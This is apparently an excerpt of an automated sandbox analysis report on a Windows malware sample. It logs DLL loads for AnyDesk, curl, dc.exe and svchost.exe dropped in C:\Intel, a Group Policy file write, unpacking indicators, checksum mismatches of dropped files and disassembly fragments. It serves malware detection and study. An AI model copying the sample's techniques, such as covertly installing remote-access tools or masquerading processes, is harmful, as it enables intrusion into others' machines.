    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: iphlpapi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: winhttp.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: secur32.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: sspicli.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: msimg32.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: usp10.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: kernel.appcore.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: uxtheme.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: windows.storage.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: wldp.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: profapi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: ntmarta.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: windowscodecs.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: thumbcache.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: policymanager.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: msvcp110_win.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: wtsapi32.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: dpapi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: cryptbase.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: dhcpcsvc.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: winmm.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: edgegdi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: iphlpapi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: winhttp.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: secur32.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: sspicli.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: msimg32.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: usp10.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: kernel.appcore.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: uxtheme.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: windows.storage.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: wldp.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: profapi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: ntmarta.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: windowscodecs.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: thumbcache.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: policymanager.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: msvcp110_win.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: dpapi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: cryptbase.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: wtsapi32.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: propsys.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: linkinfo.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: ntshrui.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: srvcli.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: cscapi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: textshaping.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: dwmapi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: textinputframework.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: coreuicomponents.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: coremessaging.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: wintypes.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: wintypes.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: wintypes.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: wtsapi32.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: wbemcomn.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: amsi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: userenv.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: version.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: dbghelp.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: symsrv.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: dataexchange.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: d3d11.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: dcomp.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: dxgi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: twinapi.appcore.dll
    Source: C:\Intel\curl.exeSection loaded: edgegdi.dll
    Source: C:\Intel\curl.exeSection loaded: secur32.dll
    Source: C:\Intel\curl.exeSection loaded: sspicli.dll
    Source: C:\Intel\curl.exeSection loaded: mswsock.dll
    Source: C:\Intel\curl.exeSection loaded: dnsapi.dll
    Source: C:\Intel\curl.exeSection loaded: iphlpapi.dll
    Source: C:\Intel\curl.exeSection loaded: rasadhlp.dll
    Source: C:\Intel\curl.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: winmm.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: edgegdi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: iphlpapi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: winhttp.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: secur32.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: sspicli.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: msimg32.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: usp10.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: kernel.appcore.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: uxtheme.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: windows.storage.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: wldp.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: profapi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: ntmarta.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: netapi32.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: netutils.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: wkscli.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: srvcli.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: cryptsp.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: rsaenh.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: cryptbase.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: msasn1.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: winmm.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: edgegdi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: iphlpapi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: winhttp.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: secur32.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: sspicli.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: msimg32.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: usp10.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: kernel.appcore.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: uxtheme.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: windows.storage.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: wldp.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: profapi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: ntmarta.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: textshaping.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: textinputframework.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: coreuicomponents.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: coremessaging.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: wintypes.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: wintypes.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: wintypes.dll
    Source: C:\Intel\dc.exeSection loaded: apphelp.dll
    Source: C:\Intel\dc.exeSection loaded: wsock32.dll
    Source: C:\Intel\dc.exeSection loaded: version.dll
    Source: C:\Intel\dc.exeSection loaded: winmm.dll
    Source: C:\Intel\dc.exeSection loaded: mpr.dll
    Source: C:\Intel\dc.exeSection loaded: wininet.dll
    Source: C:\Intel\dc.exeSection loaded: userenv.dll
    Source: C:\Intel\dc.exeSection loaded: edgegdi.dll
    Source: C:\Intel\dc.exeSection loaded: uxtheme.dll
    Source: C:\Intel\dc.exeSection loaded: windows.storage.dll
    Source: C:\Intel\dc.exeSection loaded: wldp.dll
    Source: C:\Intel\dc.exeSection loaded: kernel.appcore.dll
    Source: C:\Intel\dc.exeSection loaded: sspicli.dll
    Source: C:\Intel\dc.exeSection loaded: wbemcomn.dll
    Source: C:\Intel\dc.exeSection loaded: amsi.dll
    Source: C:\Intel\dc.exeSection loaded: profapi.dll
    Source: C:\Intel\dc.exeSection loaded: sxs.dll
    Source: C:\Intel\dc.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: edgegdi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: fhsvc.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: msidle.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: fhcfg.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wevtapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: efsutil.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: edgegdi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ncasvc.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: httpprxp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: edgegdi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wpdbusenum.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: portabledeviceapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: portabledeviceconnectapi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: edgegdi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: seclogon.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
    Source: C:\Intel\dc.exeSection loaded: wsock32.dll
    Source: C:\Intel\dc.exeSection loaded: version.dll
    Source: C:\Intel\dc.exeSection loaded: winmm.dll
    Source: C:\Intel\dc.exeSection loaded: mpr.dll
    Source: C:\Intel\dc.exeSection loaded: wininet.dll
    Source: C:\Intel\dc.exeSection loaded: userenv.dll
    Source: C:\Intel\dc.exeSection loaded: edgegdi.dll
    Source: C:\Intel\dc.exeSection loaded: uxtheme.dll
    Source: C:\Intel\dc.exeSection loaded: windows.storage.dll
    Source: C:\Intel\dc.exeSection loaded: wldp.dll
    Source: C:\Intel\dc.exeSection loaded: kernel.appcore.dll
    Source: C:\Intel\dc.exeSection loaded: sspicli.dll
    Source: C:\Intel\dc.exeSection loaded: wbemcomn.dll
    Source: C:\Intel\dc.exeSection loaded: amsi.dll
    Source: C:\Intel\dc.exeSection loaded: profapi.dll
    Source: C:\Intel\dc.exeSection loaded: sxs.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: edgegdi.dll
    Source: C:\Windows\System32\svchost.exeSection loaded: ncasvc.dll
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Intel\dc.exeFile written: C:\Windows\System32\GroupPolicy\gpt.ini
    Source: C:\Intel\AnyDesk\AnyDesk.exeWindow found: window name: SysTabControl32
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeFile opened: C:\Windows\SysWOW64\msftedit.DLLJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dwm_dda-32\privacy_feature\privacy_feature.pdb source: svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.20533988415.000000000145D000.00000004.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000002.20486832706.000000000145D000.00000004.00000001.01000000.00000009.sdmp
    Source: Binary string: C:\Users\peter\Documents\GitHub\curl-for-windows\out\x86\Release\curl.x86.pdb] source: Yv24LkKBY6.exe, 00000000.00000003.20214750806.0000000002840000.00000004.00001000.00020000.00000000.sdmp, curl.exe, 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000022.00000000.20288732251.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000023.00000000.20311294063.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000023.00000002.20326280428.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000024.00000000.20328578801.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000024.00000002.20360446525.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000025.00000000.20362870597.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000025.00000002.20385779265.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000026.00000002.20394155958.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000026.00000000.20388028622.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000027.00000002.20416665272.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000027.00000000.20396813028.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000032.00000002.20546299739.00000000002DD000.00000002.00000001.01000000.00000006.sdmp
    Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_loader\AnyDesk.pdb source: svchost.exe, 0000002A.00000002.20535133705.000000000165A000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000002.20487521906.000000000165A000.00000002.00000001.01000000.00000009.sdmp, AnyDesk.exe, 00000036.00000000.20555806082.000000000165A000.00000002.00000001.01000000.0000000F.sdmp
    Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dwm_dda-64\win_dwm\win_dwm.pdb source: svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.20533988415.000000000145D000.00000004.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000002.20486832706.000000000145D000.00000004.00000001.01000000.00000009.sdmp
    Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dwm_dda-32\win_dwm\win_dwm.pdb source: svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.20533988415.000000000145D000.00000004.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000002.20486832706.000000000145D000.00000004.00000001.01000000.00000009.sdmp
    Source: Binary string: C:\Users\ashakhmut\Projects\anydesk\deps\win_system_id\build\win_system_id_dll.pdb source: svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.20533988415.000000000145D000.00000004.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000002.20486832706.000000000145D000.00000004.00000001.01000000.00000009.sdmp
    Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_app\win_app.pdb source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp
    Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dwm_dda-64\privacy_feature\privacy_feature.pdb source: svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.20533988415.000000000145D000.00000004.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000002.20486832706.000000000145D000.00000004.00000001.01000000.00000009.sdmp
    Source: Binary string: SAS.pdbR source: svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.20533988415.000000000145D000.00000004.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000002.20486832706.000000000145D000.00000004.00000001.01000000.00000009.sdmp
    Source: Binary string: C:\Users\peter\Documents\GitHub\curl-for-windows\out\x86\Release\curl.x86.pdb source: Yv24LkKBY6.exe, 00000000.00000003.20214750806.0000000002840000.00000004.00001000.00020000.00000000.sdmp, curl.exe, 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000022.00000000.20288732251.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000023.00000000.20311294063.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000023.00000002.20326280428.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000024.00000000.20328578801.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000024.00000002.20360446525.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000025.00000000.20362870597.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000025.00000002.20385779265.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000026.00000002.20394155958.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000026.00000000.20388028622.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000027.00000002.20416665272.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000027.00000000.20396813028.00000000002DD000.00000002.00000001.01000000.00000006.sdmp, curl.exe, 00000032.00000002.20546299739.00000000002DD000.00000002.00000001.01000000.00000006.sdmp
    Source: Binary string: SAS.pdb source: svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.20533988415.000000000145D000.00000004.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000002.20486832706.000000000145D000.00000004.00000001.01000000.00000009.sdmp

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Intel\svchost.exeUnpacked PE file: 42.2.svchost.exe.400000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.reloc:R;
    Source: C:\Intel\svchost.exeUnpacked PE file: 44.2.svchost.exe.400000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.reloc:R;
    Source: C:\Intel\svchost.exeUnpacked PE file: 45.2.svchost.exe.400000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.reloc:R;
    Source: C:\Intel\AnyDesk\AnyDesk.exeUnpacked PE file: 47.2.AnyDesk.exe.400000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.reloc:R;
    Source: C:\Intel\AnyDesk\AnyDesk.exeUnpacked PE file: 48.2.AnyDesk.exe.400000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.reloc:R;
    Source: C:\Intel\AnyDesk\AnyDesk.exeUnpacked PE file: 49.2.AnyDesk.exe.400000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.reloc:R;
    Source: C:\Intel\AnyDesk\AnyDesk.exeUnpacked PE file: 53.2.AnyDesk.exe.400000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.reloc:R;
    Source: C:\Intel\AnyDesk\AnyDesk.exeUnpacked PE file: 54.2.AnyDesk.exe.400000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.reloc:R;
    Source: C:\Intel\curl.exeCode function: 34_2_001E1CE0 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoA,VerifyVersionInfoA,VerifyVersionInfoA,LoadLibraryA,GetProcAddress,34_2_001E1CE0
    Source: Yv24LkKBY6.exeStatic PE information: real checksum: 0x41877 should be: 0xe9edd
    Source: ShellEh6055.dll.40.drStatic PE information: real checksum: 0x0 should be: 0x128e9
    Source: delReg.exe.40.drStatic PE information: real checksum: 0x0 should be: 0x13839
    Source: driver.exe.34.drStatic PE information: real checksum: 0x0 should be: 0x52e17
    Source: 7z.dll.40.drStatic PE information: real checksum: 0x0 should be: 0x4e196
    Source: blat.exe.35.drStatic PE information: real checksum: 0x0 should be: 0x48812
    Source: ShellEh6055x64.dll.40.drStatic PE information: real checksum: 0x0 should be: 0x21e91
    Source: Tray.dll.40.drStatic PE information: real checksum: 0x0 should be: 0x1919f
    Source: curl.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1bceac
    Source: unins000.exe.40.drStatic PE information: real checksum: 0x0 should be: 0x131f98
    Source: 7z.dll.40.drStatic PE information: section name: .sxdata
    Source: Tray.dll.40.drStatic PE information: section name: .shared
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeCode function: 0_3_0221A524 pushfd ; retn 0040h0_3_0221A525
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeCode function: 0_3_0221A22C pushfd ; retn 0040h0_3_0221A22D
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeCode function: 0_3_02216D60 pushfd ; retn 0040h0_3_02216D61
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeCode function: 0_3_02216D60 pushfd ; retn 0040h0_3_02216D61
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeCode function: 0_3_02216A94 pushfd ; retn 0040h0_3_02216A95
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeCode function: 0_3_02216A94 pushfd ; retn 0040h0_3_02216A95
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeCode function: 0_3_02203943 pushfd ; ret 0_3_02203959
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeCode function: 0_3_02216D60 pushfd ; retn 0040h0_3_02216D61
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeCode function: 0_3_02216D60 pushfd ; retn 0040h0_3_02216D61
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeCode function: 0_3_02216A94 pushfd ; retn 0040h0_3_02216A95
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeCode function: 0_3_02216A94 pushfd ; retn 0040h0_3_02216A95
    Source: C:\Intel\curl.exeCode function: 34_2_002301E0 push ecx; mov dword ptr [esp], ecx34_2_002301E1
    Source: C:\Intel\curl.exeCode function: 34_2_00230250 push ecx; mov dword ptr [esp], ecx34_2_00230251
    Source: C:\Intel\curl.exeCode function: 34_2_002542B0 push ecx; mov dword ptr [esp], edx34_2_002542B1
    Source: C:\Intel\curl.exeCode function: 34_2_00264750 push ecx; mov dword ptr [esp], ecx34_2_00264751
    Source: C:\Intel\curl.exeCode function: 34_2_00286F40 push ecx; mov dword ptr [esp], edx34_2_00286F41
    Source: C:\Intel\curl.exeCode function: 34_2_00297400 push ecx; mov dword ptr [esp], ecx34_2_00297401
    Source: C:\Intel\curl.exeCode function: 34_2_0029F620 push ecx; mov dword ptr [esp], ecx34_2_0029F621
    Source: C:\Intel\curl.exeCode function: 34_2_001C9903 pushfd ; retf 0030h34_2_001C9904
    Source: C:\Intel\curl.exeCode function: 34_2_00267980 push ecx; mov dword ptr [esp], ecx34_2_00267981
    Source: C:\Intel\curl.exeCode function: 34_2_00269D50 push ecx; mov dword ptr [esp], ecx34_2_00269D51
    Source: C:\Intel\curl.exeCode function: 34_2_002C7F05 push ecx; ret 34_2_002C7F18
    Source: C:\Intel\driver.exeCode function: 40_2_0040106C push 00000BADh; ret 40_2_00401078
    Source: C:\Intel\driver.exeCode function: 40_2_00442470 push eax; ret 40_2_004424F8
    Source: C:\Intel\driver.exeCode function: 40_2_00437778 push ecx; mov dword ptr [esp], edx40_2_0043777F
    Source: C:\Intel\Trays\Trays.exeCode function: 41_2_00403DC4 push eax; ret 41_2_00403E00
    Source: C:\Intel\Trays\Trays.exeCode function: 41_2_00407840 push 0040786Ch; ret 41_2_00407864
    Source: C:\Intel\Trays\Trays.exeCode function: 41_2_00407610 push 00407661h; ret 41_2_00407659
